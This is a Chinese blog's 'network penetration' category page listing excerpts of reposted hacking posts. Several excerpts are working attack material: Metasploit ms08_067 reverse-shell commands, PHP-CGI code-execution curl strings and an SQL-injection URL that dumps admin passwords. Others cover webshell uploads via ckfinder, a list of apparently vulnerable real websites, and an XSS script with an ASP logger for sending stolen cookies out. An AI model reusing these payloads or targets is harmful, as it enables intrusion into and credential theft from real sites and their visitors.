随笔分类 -  网络渗透

网络渗透的各种知识、技巧、经验等等。
摘要:www.ynsyd.com/common.asp?id=1669376569.com/common.asp?id=16huangnaos.no5.cuttle.com.cn/common.asp?id=16mike-english.com/common.asp?id=16www.sogecapliban.com/sogecap/english/templates/common.asp?id=16peixun.gg3m.com/common.asp?id=16spb2777.web03.mzserver.net/common.asp?id=16www.xyjxdgxq.com/common.as 阅读全文
posted @ 2013-09-23 16:23 山貓 阅读(561) 评论(0) 推荐(1)
摘要:load db_trackerdb_nmap -T Aggressive -sV -n -O -v 192.168.0.107绑定shelluse exploit/windows/smb/ms08_067_netapiset PAYLOAD windows/shell/bind_tcp反弹shelluse exploit/windows/smb/ms08_067_netapiset PAYLOAD windows/shell/reverse_tcpMeterpreter方式set PAYLOAD windows/meterpreter/reverse_tcp生成后门/msfpayload wi 阅读全文
posted @ 2013-09-23 16:13 山貓 阅读(257) 评论(0) 推荐(1)
摘要:转自:http://www.sa666.com/thread-25247-1-1.html发布时间:2012-4.26发布作者:佚名漏洞类型:注入漏洞、上传漏洞漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面, 然后访问“/member/ajax_membergroup. 阅读全文
posted @ 2013-01-25 16:30 山貓 阅读(2187) 评论(0) 推荐(0)
摘要:转自:http://www.myhack58.com/Article/html/3/62/2009/23871.htm<?/*serv-u 7 local exp ver 1.0www.inbreak.netauthor kxlzx@xiaotou.org 2008-11-19modify 2008-11-20 *//*下面是用到的主要数据包,给大家研究用。如果你用asp等语言再写一次,可以参考。Global user list:GET /Admin/XML/OrganizationUsers.xml&ID=161&sync=1227078625078&Force 阅读全文
posted @ 2013-01-22 18:10 山貓 阅读(514) 评论(0) 推荐(0)
摘要:转自:http://acmfly.blog.163.com/blog/static/184049084201242001024914/1、本地包含直接执行代码:curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n2、远程包含执行代码:curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepe 阅读全文
posted @ 2013-01-19 13:36 山貓 阅读(343) 评论(0) 推荐(0)
摘要:漏洞版本:shopxp网上购物系统 v7.4关键词:inurl:shopxp_news.aspshopxp_news.asp暴密码的语句:/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 阅读全文
posted @ 2013-01-18 11:54 山貓 阅读(483) 评论(0) 推荐(0)
摘要:转自:http://hi.baidu.com/jsexp/item/36a73a0b4297bc133b53ee7b插入一句话这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如 http://xx.com/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 可在http://xx.com/sqlin.asp写入一句话,密码a 阅读全文
posted @ 2013-01-18 10:29 山貓 阅读(319) 评论(0) 推荐(0)
摘要:http://www.md5decrypter.co.uk/很棒,据说数据量为130亿条,个人查询下来感觉不错,很多国内的收费数据在上面都可以免费查到。xfyy888这个数据在国内三个网站上都是需要付费的,此站可以查询到。注:这个站的验证码是区分大小写的,注意一下。http://hashkiller.com/index.php?action=md5webcrack很强大,需要登陆论坛才能解密,点击右上角的“register”进行注册,都是一些简单的单词,应该能看懂吧?http://www.md5this.com/crack-it-/index.php呃,貌似可以后台破解,如果破解出来的话会Em 阅读全文
posted @ 2013-01-17 03:30 山貓 阅读(1482) 评论(0) 推荐(0)
摘要:转自:http://www.netknight.in/archives/28/1、ckfinder上传漏洞ckfinder是一个AJAX的文件管理工具,配合ckeditor用于网站上传、管理文件。但是ckfinder/ckfinder.html页面,访问不需特别权限。利用在IIS6.0的环境下的解析漏洞可拿webshell。2、ckeditor上传漏洞http://www.netknight.in/manage/ckfinder/ckfinder.html上传1.gif后再右击重命名成1.asp;.gif3、ClanSphere 2011.0集成了ckeditor编辑器(注:ckeditor是 阅读全文
posted @ 2013-01-17 03:23 山貓 阅读(13764) 评论(0) 推荐(0)
摘要:转自:http://www.hackseo.net/post/181.html 某位朋友研究的一句话木马加密经验分享给大家: 一句话木马的加密,个人感觉,如果碰上了asp后缀的数据库,而且猜出了数据库的路径,那简直就是管理员的恶梦。因为加密后的一句话木马没有任何asp的标示符!我们只要随便找个可以提交信息的页面,比如说留言板什么的都可以,就可以把一句话木马插到数据库里面。而加密后的一句话木马是不会被过滤的。加密用的工具是ANSI2Unicode,是lake2写的。下载地址:lake2一句话加密工具|ANSI2Unicode加密转换工具 这个一句话要精心构造,加密后的一句话不能有"?& 阅读全文
posted @ 2013-01-08 17:42 山貓 阅读(611) 评论(0) 推荐(0)
摘要:转自:http://www.singlex.net/2319.html昨天的节,今天才看见有个网站弄了个“光棍节程序员闯关秀“,虽然游戏采用的策略个人感觉很老套,但还是做了一下,考验思维的时候到啦!!网址:http://segmentfault.com/game/下面是我做的思路答案,不过,你可以先尝试挑战一下自己哦~以下将贴网页代码解答第1关:页面里有个隐藏链接,看代码就知道怎么过了吧k=2824ee5ee7aa6f5672f9c8d6ff651de6<html><head><title>光棍节程序员闯关秀第1关(总共10关)</title>& 阅读全文
posted @ 2012-12-11 02:42 山貓 阅读(1275) 评论(0) 推荐(0)
摘要:转自:http://www.chowngroup.com/html/2012/hackerSkills_0718/357.html 随着Web2.0时代的来临,后又推向Web3.0,Web安全开 始备受瞩目,对于白帽来说,测试时使用的工具越方便、全面、迅速越好。下面推荐一个工具Burp Suite,其功能包括HTTP包的截获及修改,扫描,网站爬行,爆破,注入检测等功能。下面就讲解一下Burp S... 阅读全文
posted @ 2012-12-08 23:12 山貓 阅读(888) 评论(0) 推荐(0)
摘要:在Metasploit中编写自己到扫描器是不是很帅到一件事呢?学习一下这段代码:#Metasploitrequire 'msf/core'class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' =>'My custom TCP scan', 'Version' =>'$Revision:1$', 阅读全文
posted @ 2012-11-30 09:14 山貓 阅读(313) 评论(0) 推荐(0)
摘要:一、BT5下安装和注册Nessus1、下载nessus。下载网址:http://www.nessus.org/products/nessus/nessus-download-agreement,在该网址中选择Agress后就会进入到下载界面。在下载界面中根据操作系统的不同下载合适的版本,本人下载的是:Ubuntu 9.10 / Ubuntu 10.04 (32 bits)这个版本。2、安装下载的.deb文件。使用dpkg命令。3、创建用户。在终端通过cd命令进入目录 opt/nessus/sbin/ ,再输入命令:nessus-adduser创建一个用户,一路yes。4、去官网进行注册,获取序 阅读全文
posted @ 2012-11-29 16:54 山貓 阅读(818) 评论(0) 推荐(1)
摘要:转自:http://www.myhack58.com/Article/html/3/7/2008/18771.htmXSS跨站脚本攻击属于被动式攻击,对于急于求成的朋友来说,往往不会被重视,而喜欢挂马的朋友则喜爱有加。通过构造特殊的页面,再把调用该页面的代码嵌在被攻击者网站的某一网页中,而当有人浏览该页面时,在后台即已执行了内嵌的代码。对于被调用页面的构造,根据不同的需求功能也不一样。最常见的是挂马,比如利用IE漏洞悄悄在浏览者的计算机上种植木马;而另一种方式则可以利用互动式页面的各种语言(如ASP,PHP,JSP等)来构造一个完全达到自己需求的页面,而不是简单地做一种达到目的的“介质”。 . 阅读全文
posted @ 2012-11-27 13:34 山貓 阅读(832) 评论(0) 推荐(0)
摘要:转自:http://blog.csdn.net/cnbird2008/article/details/4299544http://ha.ckers.org/xss.html关于XSS Proxy技术关于Cross Iframe Trick的思路。让我想到了曾经看到的关于XSS Proxy的一些文章。Advanced Cross-Site-Scripting with Real-time Remote Attacker Control ,精彩之处:还有一篇关于Advanced XSS attacks and XSS-Proxy 的PPT。都是05年的资料了。它的主要思想是:在有XSS漏洞(持久型 阅读全文
posted @ 2012-11-26 22:13 山貓 阅读(350) 评论(0) 推荐(0)
摘要:参考:http://zhchx0827.iteye.com/blog/1681349下面是我测试的代码,贴出来记录一下:<script>document.write('<form name=myForm></form>'); var myForm=document.forms['myForm']; myForm.action='http://192.168.0.100/emlog/?action=guestbook'; myForm.method='POST'; var input = docu 阅读全文
posted @ 2012-11-26 10:25 山貓 阅读(813) 评论(0) 推荐(0)
摘要:<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>news.asp代码:<%msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("cook.txt") set fs=server.CreateO 阅读全文
posted @ 2012-11-25 16:08 山貓 阅读(370) 评论(0) 推荐(0)
摘要:转自:http://www.2cto.com/Article/200906/39180.html暗组 zachary大学快毕业了,想起高考时想填的一个学校,由于高考考的比较差,只超过二本十多分,只能往二本中靠低的学校填。首先踩点,打开google输入:site:XXXXXX inurl:asp?id= 搜出很多链接,随便打开了一个,在后面加上单引号,提示如图一所示明显做了防注入过滤。按照我一般的思路是:首先是检查是否有注入点,不行就检查cookie注入,再不行就找别的突破点。清空地址栏,输入:javascript:alert(document.cookie=”id=”+escape(“1556 阅读全文
posted @ 2012-11-25 13:49 山貓 阅读(512) 评论(0) 推荐(0)
摘要:转自:http://hi.baidu.com/orz_men/item/e69491ffc86107ec1b111f86'SQL通用防注入程序'Aseanleung'--------定义部份------------------Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstrDim fso1,all_tree2,file1,files,filez,fs1,zruseripIf Request.QueryString<>"" Then (对Request.QueryString提交(客户 阅读全文
posted @ 2012-11-25 12:45 山貓 阅读(695) 评论(0) 推荐(0)